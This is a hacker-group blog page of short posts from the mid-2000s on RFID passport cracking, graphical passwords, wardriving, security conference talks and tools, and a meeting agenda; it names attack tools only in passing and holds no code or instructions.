October 25th, 2014

RFID, tinfoil, “luciferian beehivers” and you

I’m not sure why I (or the register) didn’t hear about this earlier, but apparently the proposed Dutch biometric passport has already been cracked. It looks like this was announced here some time ago. Electronic (being used here as a euphemism for RFID now that it’s a bad word) passports are going to be issued during a pilot program in the US starting this month, but full compliance isn’t mandatory until this October.

This seems awfully fast considering that the Department of State says that they “will not issue passports incorporating integrated circuits until privacy-related concerns have been addressed.“, and the initial feedback they received on the proposal was apparently 98.5% negative. This feedback, by the way, has been posted in whole on their website. When I say “in whole”, I mean all of it, including the name, email address and sometimes physical address and phone number, and anything else in the feedback (both email and snail mail). So, way to go, thanks for addressing our privacy concerns by posting the personal information of everyone that had feedback on the subject.

Just for grins, I whipped something up to grab all of the submitted comments, and did find this a particular gem (I promise I did not make this up, it’s on the site!):

No mark of the beast for me you Luciferian beehivers.
You can take all those RFID chips wrapped like a burrito in the HR 4(6+6+6)
national id bill and stick it up yor own arse!

That left me to wonder what a “Luciferian beehiver” was though, I’m not a big fan of either Satan or Bees, much less a ghastly union of the two. Burritos are good though. This comment was left by someone claiming to be simultaneously from both Texas and Heaven, though I’m pretty sure the two are nowhere near each other. I also found 9 other comments that referenced the “mark of the beast”, 17 that speak of “evil”, and 4 “Anti-Christs”.

Anyway, beehives aside, here is a link to the slides of the original researchers (Bart Jacobs & Ronny Wichers Schreur) who exposed the dutch passport crack, and here are a couple slides on the demo that he gave. The good thing is that it takes two hours with a computer (nobody ever waits two hours in an international airport, right?), and that there is still time for improvements (hopefully fixes) before they are primetime.

Graphical Passwords

The Graphical Passwords Project is an interesting alternative to the “typed” passwords we are all used to. “The idea of graphical passwords is to let the user click (with a mouse or a stylus) on a few chosen regions in an image that appears on the screen“. So if you click on the right regions, your are in! I have to agree that clicking on Pamela Anderson’s photo for the password is a lot more exciting compared to typing long strings of ascii. However, Graphical Passwords are still vulnerable to shoulder-surfing, bruteforce, and dictionary attacks (well not exactly dictionary, but we all know that selecting images of nipples for passwords will soon be on top10 commonly used graphical passwords). This paper offers a few solutions to this problem like the use of randomly generated images or numbers and the use of image selection techniques not easily registered by malicious code (like dragging icons on the screen). If you would like to mess around with graphical passwords, then there is a .NET Graphical Password Simulation application to experiment and learn about this password scheme.

nice wi-fi card

This looks like a nice 400mW miniPCI wi-fi card based on a 6th generation atheros chipset. I particularly liked the warnings on the site: “This card is only for OEM, ODM and DIY system designs. This card is not suitable for laptop use.“. Especially amusing when combined with link later in the same page for “Visual how to install in a laptop“. Thanks to mother for the link.

I’ll take two.

HITB video

Here are some official .torrents of the videos from the Hack in the Box conference held in Kuala Lumpur. They even had one just for Jason on hacking windows CE. ;)

Seed away people, I’m only getting about 12k right now, =)


The new-ish online computer security journal Uninformed now has volume three out. It has some interesting and in depth material on topics like reverse engineering, fuzzing and Rootkit technique evolution (from both sides).

metasploit tutorial

Here’s a link to a tutorial on Metasploit. The subject material is a little aging though as metasploit 3.0 is now in second alpha, and the article details version 2.3 that comes with Whax. Whax feels like it’s getting a bit old now too since it was announced some time ago that Auditor and Whax are merging into BackTrack (but I haven’t seen anything out of it yet). Maybe if they wait long enough I can try to get wicrawl on it, =).

Somone let me know if you a tutorial like this for 3.0.

Wardriving with nintendo DS

Well, it looks like the Nintendo DS is finally starting to catch up to the PSPs wi-fi/wardriving capabilities. Now I guess it’s time to port wicrawl to the PSP, =). We’ll have to see how useful the python interpreter is, and how obfuscated the wireless interfaces are.

Thanks engadget

CodeCon ’06

CodeCon is coming up soon (Feb 10-12th) in San Francisco. They just announced the speaker list, and the early registration will be ending soon (Feb 1). It looks like there will be a few interesting talks.

Shmoocon ’06

Just checking in after meeting up at Shmoocon
this year. The conference was good, especially considering that it’s only a
second year con. Attendance was sold out at 800 people, and the additional
tickets on ebay were getting pretty expensive.

Highlights include:

Chilling with MRL people

We couldn’t seem to get all the slackers in the same room, but I was able to meet some people that were previously “virtual only”. Thanks to Focus for putting me up at his place, and showing me around. =)

Kaminsky is always a lark

Most of this talk was “the same-old”, but he also spoke a bit about network visualization with his new tool “xovi”.

Raw Fake AP, and Raw Glue AP and ??

I missed this talk by the guys at France Telecom, but heard about some new tools that werereleased. Raw Fake AP is a newer version of Fake AP that eliminates the obvious fingerprinting so you it’s harder to find the “real” AP in the noise.Glue AP sounds pretty cool too. It listens for the broadcast SSID request sent out when certain client cards start searching for a network. Glue AP then emulates whatever the card islooking for, and in some cases, the client will auto-join that network.

“Mystery tool” — I still want know what this one was, =). I’ve emailed them to try to get their slides, it doesn’t look like they’re posted yet on the shmoocon site.

H1kari and “cardbus bus-mastering: owning the laptop”:

This was interesting and informational, though unfortunately the demo part was eighty-six’d at the last minute. Instead David [someone?] spoke about weaknesses in USB, and the bottom line was that you could write directly into memory and own a system simply by plugging in a USB device. I’m still interested in H1kari’s company’s FPGA “on a stick” though, hopefully they’re not too expensive when they come out.

RenderMan (and others) and pre-hashed WPA passwords

‘genpmk’ (or maybe jdumas??) is supposedly a new tool for doing this kind of thing. Church of wifi has more details.

Oh, and by the way, all you windows weenies now have Kismet for windows.

Getting kicked out of the “mafia room” at the shmoocon party by famous Persian pop singers

Ok, we weren’t kicked out so much as edged out, but it took a little investigation to determine who the VIPs were. Their entourage was pretty intimidating too. The whole thing was a little surreal. I definitely had a little bit of “chest hair and over-sized sunglasses envy”.

An internet enabled arcade style crane

Somehow connecting random objects and making them either “internet enabled”, or “USB-powered” is always cool.

The .torrent’s of the talks and slides are supposed to be posted soon.
Someone post a comment if they see this before I do and I’ll update the post.

January Meeting Agenda

Here’s the agenda for the January Meeting. If you’re interested in attending (This Friday at 7pm) let us know:

Phase 0x0: Bootstrapping
- Greetings and welcome
- MRL updates and status
- Starting the new year out right
- Member lists
- New initiatives
- Participation
Phase 0x1: Initialization
- ZigBee presentation (Jason Spence)
- ZigBee/RFID/librf brainstorming
- wicrawl
- Status
- Design, brainstorming, etc
- Demo ??
- Project Hacking!
Phase 0x2: Local exploits
- Food
- WiFi Theremin Demo ??!!
- Off topic tools, toys and other shiny things -- If anyone
has any interesting to show off or play with, please bring
- Whatever till whenever -- This is the more social
part of the event.  People are invited to stay and
hack and have a couple drinks till whenever this
phase is no longer self-sustaining, =)

Imhotep theme designed by Chris Lin. Proudly powered by Wordpress.
XHTML | CSS | RSS | Comments RSS